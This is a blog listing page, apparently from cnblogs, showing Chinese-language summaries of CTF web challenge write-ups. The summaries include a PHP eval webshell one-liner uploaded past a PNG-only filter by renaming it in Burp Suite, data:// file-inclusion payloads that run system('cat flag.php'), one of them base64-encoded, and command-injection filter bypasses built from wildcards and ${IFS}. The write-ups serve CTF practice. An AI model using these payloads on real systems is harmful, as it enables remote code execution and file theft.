摘要:
同web151 阅读全文
posted @ 2021-02-03 21:35
z1ten9
阅读(217)
评论(0)
推荐(0)
摘要:
只能上传png图片,我们写一个一句话木马<?php @eval($_POST['attack']) ?> 重命名为1.png,bp抓包,然后上传, ctrl+R放到repeater中,将1.png改为1.php GO一下,发现上传成功,返回了上传路径/upload/1.php 用蚁剑连接,在/var 阅读全文
posted @ 2021-02-03 21:29
z1ten9
阅读(282)
评论(2)
推荐(0)
摘要:
payload:?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg== PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==即 阅读全文
posted @ 2021-02-03 15:55
z1ten9
阅读(251)
评论(0)
推荐(0)
摘要:
利用data://text/plain, payload:?file=data://text/plain,<?php system("cat flag.php");?> 阅读全文
posted @ 2021-02-03 15:48
z1ten9
阅读(208)
评论(0)
推荐(0)
摘要:
方法一:利用paste查看文件内容 payload:?c=paste$fla?.php 方法二: payload:/bin/?at${IFS}f??????? 可以理解为当前目录运行cat命令实际上运行的也是bin/cat,而通配符不会帮你去找到bin下面的cat 只会在当前目录寻找能通配的文件,所 阅读全文
posted @ 2021-02-03 11:07
z1ten9
阅读(274)
评论(0)
推荐(0)
浙公网安备 33010602011771号